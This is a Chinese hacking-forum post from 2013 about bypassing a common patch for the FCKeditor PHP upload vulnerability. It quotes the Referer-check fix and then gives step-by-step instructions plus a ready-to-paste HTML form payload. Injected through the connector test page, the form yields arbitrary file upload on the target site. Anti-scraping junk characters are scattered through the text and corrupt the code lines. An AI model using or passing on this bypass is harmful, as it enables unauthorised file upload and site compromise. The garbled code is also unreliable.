找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2274|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
! f( I! m) ]) ^网上给出的修复方案是
( N; B5 n& d* U* F修复方法,删除FCK编辑器用其他的编辑器
+ S' b4 o5 q! B& m8 A或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
9 P# {7 k* Z; c: k  z8 _) o
& b7 Z6 c: P+ [2 |/ V8 j! A8 _require(‘config.php’);; E1 `3 U1 w4 s/ r
require(‘util.php’);9 j8 R/ n6 g8 m0 q' p
的下面添加以下代码—————————–
1 i# w% {/ X; z; @) t1 n* B9 [//防止外部提交
" z( ~. a4 j# M; O/ xfunction outsidepost()1 b4 ?1 O7 C# y/ p% N2 W
{
: d9 H! X0 w0 P7 f. u1 B  s3 m$servername=$_SERVER['SERVER_NAME'];
* H& J  A/ a8 a5 V7 X- x6 t! T$sub_from=@$_SERVER['HTTP_REFERER'];( |- q0 }3 a* `! J# K
$sub_len=strlen($servername);
6 j! k6 j3 [! q; n2 R$checkfrom=substr($sub_from,7,$sub_len);
, ~  N' O. M% T+ W! L* C4 W; zif($checkfrom!=$servername){! ?( `( a  P" A" _' b* J
echo(“you don’t outsidepost!”);+ }7 l" I! h0 t: A& y
exit;
; h) \/ `8 l! I5 k, L}( s7 D/ `) ?2 k7 U3 V
}
+ U8 c  |8 E9 toutsidepost();
% @7 H; ?2 D; G- q防止外部提交,但是没有防止内部提交,- k% p/ W/ ?  ?4 l* V1 I
利用方法:" b3 ?. ?+ G4 t+ b/ f4 w9 X  b
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html0 a% o5 H( Y8 }+ d2 l; [1 o; q/ q
2,在Current Folder 框输入3 U/ V8 F6 q- Z
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
# g9 i, ~& t, K( o# d2 X然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 T5 R, c4 @3 f$ P' b6 I9 X
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表